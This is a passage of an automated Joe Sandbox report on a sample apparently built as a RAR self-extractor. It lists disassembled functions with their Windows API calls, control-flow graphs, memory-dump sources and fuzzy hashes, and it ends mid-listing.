                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$CreateErrorLast$Time
                  • String ID:
                  • API String ID: 1999340476-0
                  • Opcode ID: 15e583712bfbe0fc4e7d68f75b3d6ee8bd104705f1556bd5d4452bb90ffeedba
                  • Instruction ID: 4cf1de0920bfbbba7b1d0eac894fd7b1cbeaa51726b03d1da13fc64238de1cd2
                  • Opcode Fuzzy Hash: 15e583712bfbe0fc4e7d68f75b3d6ee8bd104705f1556bd5d4452bb90ffeedba
                  • Instruction Fuzzy Hash: E54144315487496FE730DB64CC05BEABBD8BB01324F100719F6E4961D0E7B9A989CBA1
                  Function 00A0AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 999 a0ac74-a0ac8d PeekMessageW 1000 a0acc8-a0accc 999->1000 1001 a0ac8f-a0aca3 GetMessageW 999->1001 1002 a0acb4-a0acc2 TranslateMessage DispatchMessageW 1001->1002 1003 a0aca5-a0acb2 IsDialogMessageW 1001->1003 1002->1000 1003->1000 1003->1002
                  APIs
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0AC85
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0AC96
                  • IsDialogMessageW.USER32(0001042A,?), ref: 00A0ACAA
                  • TranslateMessage.USER32(?), ref: 00A0ACB8
                  • DispatchMessageW.USER32(?), ref: 00A0ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchPeekTranslate
                  • String ID:
                  • API String ID: 1266772231-0
                  • Opcode ID: b6e2c85c77201485b6c74e450f9edd45b2062a213c078ca93e41f29d2de5608e
                  • Instruction ID: b2fcffe075350c10268344b6660a5d234a2fd2bfb4cac524c79ce406b9d1d7eb
                  • Opcode Fuzzy Hash: b6e2c85c77201485b6c74e450f9edd45b2062a213c078ca93e41f29d2de5608e
                  • Instruction Fuzzy Hash: D5F0BD7290232DABDB20DBE6AC4CEEB7F6CFE162527404415F515D2190EB28D906C7B1
                  Function 00A0A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1004 a0a2c7-a0a2e6 GetClassNameW 1005 a0a2e8-a0a2fd call a017ac 1004->1005 1006 a0a30e-a0a310 1004->1006 1011 a0a30d 1005->1011 1012 a0a2ff-a0a30b FindWindowExW 1005->1012 1007 a0a312-a0a315 SHAutoComplete 1006->1007 1008 a0a31b-a0a31f 1006->1008 1007->1008 1011->1006 1012->1011
                  APIs
                  • GetClassNameW.USER32(?,?,00000050), ref: 00A0A2DE
                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A0A315
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A0A305
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                  • String ID: EDIT
                  • API String ID: 4243998846-3080729518
                  • Opcode ID: 1281685d19319ec322d50af37323ad6f6444f897b15f1ead59b148388763ddd4
                  • Instruction ID: 53fdaa5066b53333a87eafd43cd48d57d8472fd1ab53839291f63eca41445db9
                  • Opcode Fuzzy Hash: 1281685d19319ec322d50af37323ad6f6444f897b15f1ead59b148388763ddd4
                  • Instruction Fuzzy Hash: B8F08236B4232C77E72097A4BC05FEB776CAB46B11F440066BD05A61C0D7609D42C6F7
                  Function 00A0D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1013 a0d287-a0d2bb call a0e360 SetEnvironmentVariableW call 9ffbd8 1018 a0d2bd-a0d2c1 1013->1018 1019 a0d2df-a0d2e3 1013->1019 1020 a0d2ca-a0d2d1 call 9ffcf1 1018->1020 1023 a0d2c3-a0d2c9 1020->1023 1024 a0d2d3-a0d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1019
                  APIs
                  • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A0D29D
                  • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A0D2D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: EnvironmentVariable
                  • String ID: sfxcmd$sfxpar
                  • API String ID: 1431749950-3493335439
                  • Opcode ID: 1345264ac2fad0c9f4f7941bd6d780623bbff64b0d83ec59203c9d408f8f24e0
                  • Instruction ID: 10f6932343d9a1b5e42a35cd2472b43dce63a8821fea8052fade9f60129f27f1
                  • Opcode Fuzzy Hash: 1345264ac2fad0c9f4f7941bd6d780623bbff64b0d83ec59203c9d408f8f24e0
                  • Instruction Fuzzy Hash: 5EF0A77380123CA6DB206FD4AC19BFA7B68BF09B41B004561FD8456181D674CD51D7F1
                  Function 009F984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1025 9f984e-9f985a 1026 9f985c-9f9864 GetStdHandle 1025->1026 1027 9f9867-9f987e ReadFile 1025->1027 1026->1027 1028 9f98da 1027->1028 1029 9f9880-9f9889 call 9f9989 1027->1029 1030 9f98dd-9f98e2 1028->1030 1033 9f988b-9f9893 1029->1033 1034 9f98a2-9f98a6 1029->1034 1033->1034 1037 9f9895 1033->1037 1035 9f98a8-9f98b1 GetLastError 1034->1035 1036 9f98b7-9f98bb 1034->1036 1035->1036 1038 9f98b3-9f98b5 1035->1038 1039 9f98bd-9f98c5 1036->1039 1040 9f98d5-9f98d8 1036->1040 1041 9f9896-9f98a0 call 9f984e 1037->1041 1038->1030 1039->1040 1042 9f98c7-9f98d0 GetLastError 1039->1042 1040->1030 1041->1030 1042->1040 1044 9f98d2-9f98d3 1042->1044 1044->1041
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 009F985E
                  • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 009F9876
                  • GetLastError.KERNEL32 ref: 009F98A8
                  • GetLastError.KERNEL32 ref: 009F98C7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLast$FileHandleRead
                  • String ID:
                  • API String ID: 2244327787-0
                  • Opcode ID: 24819270e28ce458c59b7642cf3e5b2a435a11ac5ba379e083c49a22cf7d7274
                  • Instruction ID: 9f841133d9c3cba1c0d2de43e2ac4340f142569787dd47a49e7291866a0f5d5f
                  • Opcode Fuzzy Hash: 24819270e28ce458c59b7642cf3e5b2a435a11ac5ba379e083c49a22cf7d7274
                  • Instruction Fuzzy Hash: 0811AC3190420CFFDF209B55C804BB937ACEB437B1F10852AFA2A85590D7399E419F61
                  Function 00A1A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00A13713,00000000,00000000,?,00A1A49B,00A13713,00000000,00000000,00000000,?,00A1A698,00000006,FlsSetValue), ref: 00A1A526
                  • GetLastError.KERNEL32(?,00A1A49B,00A13713,00000000,00000000,00000000,?,00A1A698,00000006,FlsSetValue,00A27348,00A27350,00000000,00000364,?,00A19077), ref: 00A1A532
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A1A49B,00A13713,00000000,00000000,00000000,?,00A1A698,00000006,FlsSetValue,00A27348,00A27350,00000000), ref: 00A1A540
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 232e799f9fe388b33f9877767966c639f0dd59436dc9811834f8cedbe9251a34
                  • Instruction ID: 4855897db5f31e3110bcd5ca9cae25ab54d78194cf3b3db725e48d30e8599570
                  • Opcode Fuzzy Hash: 232e799f9fe388b33f9877767966c639f0dd59436dc9811834f8cedbe9251a34
                  • Instruction Fuzzy Hash: 5501FC3265B222ABCB31CBAC9C44AB67769AF567B1B140630F90AD3140D735D942C6E1
                  Function 009F9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,009FCC94,00000001,?,?,?,00000000,00A04ECD,?,?,?), ref: 009F9F4C
                  • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00A04ECD,?,?,?,?,?,00A04972,?), ref: 009F9F8E
                  • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,009FCC94,00000001,?,?), ref: 009F9FB8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileWrite$Handle
                  • String ID:
                  • API String ID: 4209713984-0
                  • Opcode ID: 4d157aa1c86dddee92cf13f7e1c07ce3370aa7329c1acaf7d6600e22452bc0da
                  • Instruction ID: 39dbd059efa21db22d3d51cd9d1a2220d18b6e4b2bae783b72f4bcceed2cd501
                  • Opcode Fuzzy Hash: 4d157aa1c86dddee92cf13f7e1c07ce3370aa7329c1acaf7d6600e22452bc0da
                  • Instruction Fuzzy Hash: B631E5712083099BDF208F14D948B7ABBA8EF91710F04455DFA49DB181CB75DD49CBB2
                  Function 009FA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA22E
                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA261
                  • GetLastError.KERNEL32(?,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA27E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CreateDirectory$ErrorLast
                  • String ID:
                  • API String ID: 2485089472-0
                  • Opcode ID: 0cb3972936d504490bb83a7302283680b103c0736f85a7b9952a665a7997e839
                  • Instruction ID: e1a1f4c0cee522cfde6a2ec02b920ee314b572ecaac5de72a82c912353c2136e
                  • Opcode Fuzzy Hash: 0cb3972936d504490bb83a7302283680b103c0736f85a7b9952a665a7997e839
                  • Instruction Fuzzy Hash: BD01C0B134421C66DF329BA98C05BFE334CAF0A751F044811FB69D5091C76A8A42D7B3
                  Function 00A1AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                  Download Yara Rule
                  APIs
                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00A1B019
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Info
                  • String ID:
                  • API String ID: 1807457897-3916222277
                  • Opcode ID: 811e74b5a53ca6291a50aa2b141a5bb8c5bba2380f4a927c7c419726961de7a7
                  • Instruction ID: 9a8f637233bfd32bce971114d3b928345c457cc93b3160475772761cfc9aadb9
                  • Opcode Fuzzy Hash: 811e74b5a53ca6291a50aa2b141a5bb8c5bba2380f4a927c7c419726961de7a7
                  • Instruction Fuzzy Hash: AA4106B050438CAADF218B64CC94AF7BBB9DB59304F1405EDE59A87142D3359A85DF70
                  Function 00A1A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00A1A79D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: String
                  • String ID: LCMapStringEx
                  • API String ID: 2568140703-3893581201
                  • Opcode ID: e1887eac7b74d36835d128f634bcfcbdd7b6b504558d90f4c7a94418ca698ff6
                  • Instruction ID: 5fd97817aca9a88365811dd6b1df7f9e28224f71a5263b7694b29aecf0320c9a
                  • Opcode Fuzzy Hash: e1887eac7b74d36835d128f634bcfcbdd7b6b504558d90f4c7a94418ca698ff6
                  • Instruction Fuzzy Hash: A401253254121CBBCF129FA4ED01DEE3F66FF18720F044524FE1465160CA768A72EB91
                  Function 00A1A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00A19D2F), ref: 00A1A715
                  Strings
                  • InitializeCriticalSectionEx, xrefs: 00A1A6E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 2593887523-3084827643
                  • Opcode ID: b447ee1fa2c9c37246d1d82bd5e83c3589b6f9d8e911d7ab1523ce4e56bc9dfe
                  • Instruction ID: 353cc6569f6d6066c2ecf8cfb876cc44b882a6bb52e13054e20a1973a579e1da
                  • Opcode Fuzzy Hash: b447ee1fa2c9c37246d1d82bd5e83c3589b6f9d8e911d7ab1523ce4e56bc9dfe
                  • Instruction Fuzzy Hash: EBF0B43164621CBBCF11AF68DC05CAE7F61FF15720B004564FC055A260DA718A52AB91
                  Function 00A1A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: dc190250222a117d191aea8a0e8812bb7faa0f9f1c07c7a582cccd75e8acc474
                  • Instruction ID: 791ab075a7d9c79b2bb24f375de0b7837e64692dcefb6deeb6a9adac351956e9
                  • Opcode Fuzzy Hash: dc190250222a117d191aea8a0e8812bb7faa0f9f1c07c7a582cccd75e8acc474
                  • Instruction Fuzzy Hash: A5E05C71B4622C7BD620EBA8AC068FDBB51EB35720B000134FC0417240CD744F02A6D5
                  Function 00A1329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 00A132AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: c3c0d7a6a7aa1c3bdb3e0cd4e14f8c7f2666bfd729e826c31a224d3f9981cceb
                  • Instruction ID: 036abe21cf55abf04667d75378101891116d5f968c7005faa4671c23e1aa7d28
                  • Opcode Fuzzy Hash: c3c0d7a6a7aa1c3bdb3e0cd4e14f8c7f2666bfd729e826c31a224d3f9981cceb
                  • Instruction Fuzzy Hash: 40D02B33B816387ADD1437E87C079FE7E05A701FF5F490A72FE081A1828671855101C5
                  Function 00A0E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0E20B
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID: 3To
                  • API String ID: 1269201914-245939750
                  • Opcode ID: 524d933d6338e60f928868c1dc47c3c0f6ba4f79b20180c2d8cb477fbda7d2ab
                  • Instruction ID: e56762ac82bf60c50d19f41e518bec3d0f76c5b65d69d306bf7fd36b19ee6bab
                  • Opcode Fuzzy Hash: 524d933d6338e60f928868c1dc47c3c0f6ba4f79b20180c2d8cb477fbda7d2ab
                  • Instruction Fuzzy Hash: 98B012A267F006BD720C91447F06D7A032CD8C0B51330CC2ABA05D40C1A5804D095432
                  Function 00A1B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A1AF1B: GetOEMCP.KERNEL32(00000000,?,?,00A1B1A5,?), ref: 00A1AF46
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A1B1EA,?,00000000), ref: 00A1B3C4
                  • GetCPInfo.KERNEL32(00000000,00A1B1EA,?,?,?,00A1B1EA,?,00000000), ref: 00A1B3D7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: b6ac24cdef4d466a12c3b2c47a3486fc2dbe453a2ebce8712c31d4123bdf31e3
                  • Instruction ID: aaf4485f1f33e10a683ad1f81aa4e4fdec1069647c7eadd349ba64d465052dd8
                  • Opcode Fuzzy Hash: b6ac24cdef4d466a12c3b2c47a3486fc2dbe453a2ebce8712c31d4123bdf31e3
                  • Instruction Fuzzy Hash: 2A5145B09102159FDB24CF75C8806FABBF5EF51310F18846ED0968B293D73999C6CBA1
                  Function 009F1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F6057: __EH_prolog.LIBCMT ref: 009F605C
